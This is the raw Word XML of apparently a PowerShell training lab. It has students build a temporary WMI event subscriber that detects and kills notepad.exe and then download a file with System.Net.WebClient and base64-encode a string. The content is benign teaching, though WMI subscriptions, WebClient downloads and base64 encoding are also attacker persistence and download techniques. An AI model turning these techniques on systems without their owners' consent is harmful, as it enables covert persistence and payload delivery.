    <w:p w14:paraId="440D360D" w14:textId="069650E0" w:rsidR="00301ED8" w:rsidRDefault="00301ED8" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a WMI filter that will ultimately stop notepad anytime that it is started. </w:t>
      </w:r>
      <w:r w:rsidR="00FC3E6A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this section we will do the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA94710" w14:textId="3BBB80B1" w:rsidR="00FC3E6A" w:rsidRPr="00FC3E6A" w:rsidRDefault="00FC3E6A" w:rsidP="00FC3E6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Create a temporary WMI subscriber that will stop notepad.exe once it is started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAA38C" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRDefault="00301ED8" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02216CC2" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRDefault="00301ED8"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755EF12" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRDefault="00301ED8" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16C15FE8" w14:textId="0880AA4E" w:rsidR="00301ED8" w:rsidRPr="005525A0" w:rsidRDefault="00301ED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e are going to define a query that will identify when notepad.exe is started. At that point we will obtain the PID for the notepad.exe process and then stop the process. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13891403" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRDefault="00301ED8" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD16A92" w14:textId="77777777" w:rsidR="00301ED8" w:rsidRDefault="00301ED8"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31D17C04" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="00DB1131" w:rsidP="00DB1131">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6B1F37" w14:textId="23983EE8" w:rsidR="00DB1131" w:rsidRPr="00622089" w:rsidRDefault="00DB1131" w:rsidP="00DB1131">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Stage 1: Background Questions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939362B" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="00DB1131" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Before working on the subscriber answer the following questions. You will be using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmiexplorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the following steps </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18999CF7" w14:textId="77777777" w:rsidR="00DB1131" w:rsidRDefault="00301ED8" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Which WMI class will give us information about currently running processes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD79643" w14:textId="3DDBCA71" w:rsidR="00DB1131" w:rsidRDefault="00301ED8" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">What is the name of the property that contains the ID number for a particular process? Is it PID or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB1131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ProcessId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB1131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB1131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ProcessIdentificationNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB1131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106FE261" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00301ED8" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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 xml:space="preserve">We will be creating a temporary subscriber in the following steps: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF87DDC" w14:textId="2F4C59CA" w:rsidR="00301ED8" w:rsidRPr="00082B5F" w:rsidRDefault="00301ED8" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>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Which event based WMI class should we filter on to identify new processes that are created? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323275D" w14:textId="6821F673" w:rsidR="0049103E"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 The subscriber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE31E6F" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00453A5B"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Using the ISE, c</w:t>
      </w:r>
      <w:r w:rsidR="00316B31" w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">reate the following the following three variables: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BB0B45" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00316B31" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>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query = &lt;Up to student to determine&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158F659F" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00316B31" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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e want the query to run every five seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D1EA3" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00C200D8" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>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We want it to specifically look for notepad.exe *hint which property would contain this information? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462E6533" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00316B31"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action = { $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Global:MyEvt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=$event ; write-</w:t>
      </w:r>
      <w:r w:rsidR="0049103E" w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “event occurred”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A87DC43" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00316B31"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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sourceId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= “testing”</w:t>
      </w:r>
      <w:r w:rsidR="00453A5B" w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C6379" w14:textId="758B9A03" w:rsidR="0049103E" w:rsidRPr="00082B5F" w:rsidRDefault="0049103E"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Configure the subscriber. The syntax </w:t>
      </w:r>
      <w:r w:rsidR="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">will look something as follows: </w:t>
      </w:r>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;cmdlet&gt; -query $query –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sourceidentifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sourceId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –action $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="507CA9BA" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00453A5B" w:rsidP="00082B5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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rt notepad. If everything is correct, you will see “event occurred” show in your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ISE terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2C875" w14:textId="5C7EB555" w:rsidR="00082B5F"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3: The Event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFAB2B0" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="00C200D8"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Browse the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0049103E" w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ewley</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0049103E" w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> created $event variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA00909" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="0049103E" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MyEvt.SourceEventArgs.NewEvent.targetinstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6518FA5B" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="0049103E"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The properties seen here will duplicate what we saw when browsing the win32_process class through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmi_explorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194A08D" w14:textId="0A496588" w:rsidR="0049103E" w:rsidRDefault="0049103E"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Determine which cmdlet will remove the subscriber we created earlier. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8B82C" w14:textId="30D5B7C1" w:rsidR="00082B5F"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4:  Stop it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5048E4" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="0049103E"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Modify the $action variable set earlier in this lab, so that the notepad.exe process is stopped. You will need to determine the following items: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D121EC" w14:textId="77777777" w:rsidR="00082B5F" w:rsidRDefault="0049103E" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>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hat cmdlet can we use to kill notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52127B" w14:textId="77777777" w:rsidR="00082B5F"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Determine a way to pass the process id of notepad.exe to the cmdlet identified in the prior step. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC23EF" w14:textId="77777777" w:rsidR="00082B5F"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Remove any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eventsubscribers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> currently configured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E1A037" w14:textId="6FFB7B96" w:rsidR="00FB11A0"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Start new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eventsubscriber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC11BC3" w14:textId="12104042" w:rsidR="00082B5F" w:rsidRPr="00082B5F" w:rsidRDefault="00082B5F" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="1800"/>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Make sure to clean it up or never run notepad </w:t>
      </w:r>
      <w:r w:rsidRPr="00082B5F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8FFAF3" w14:textId="4EAD6785" w:rsidR="0049103E" w:rsidRDefault="0049103E" w:rsidP="00DB1131">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642E391B" w14:textId="18B83460" w:rsidR="00E4017B" w:rsidRDefault="00E4017B"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9 </w:t>
      </w:r>
      <w:r w:rsidR="00FC1AE3">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.NET – Time permitting or @Home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51BB77" w14:textId="77777777" w:rsidR="00E4017B" w:rsidRDefault="00E4017B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BCB957" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00082B5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F1B38" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F63FA4D" w14:textId="6F7CA7EC" w:rsidR="00F256E3" w:rsidRDefault="00FC3E6A" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
        </w:rPr>
        <w:t xml:space="preserve">Gain familiarity using a .net static class. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this section we will do the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43027F" w14:textId="22B47B67" w:rsidR="00FC3E6A" w:rsidRDefault="00FC3E6A" w:rsidP="00FC3E6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Download a file using the appropriate .net class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA75C3" w14:textId="00EEF5CA" w:rsidR="00FC3E6A" w:rsidRPr="00FC3E6A" w:rsidRDefault="00FC3E6A" w:rsidP="00FC3E6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Garamond"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Encode a string into base64 using .net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79863655" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDF5D55" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00082B5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Tahoma"/>
        </w:rPr>
        <w:t>Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C4280" w14:textId="77777777" w:rsidR="00F256E3" w:rsidRDefault="00F256E3" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D9A90B" w14:textId="227A6AC0" w:rsidR="00082B5F" w:rsidRPr="00622089"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system.net.webclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> class to download a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F3C9A" w14:textId="77777777" w:rsidR="00FC1AE3" w:rsidRDefault="00F256E3" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
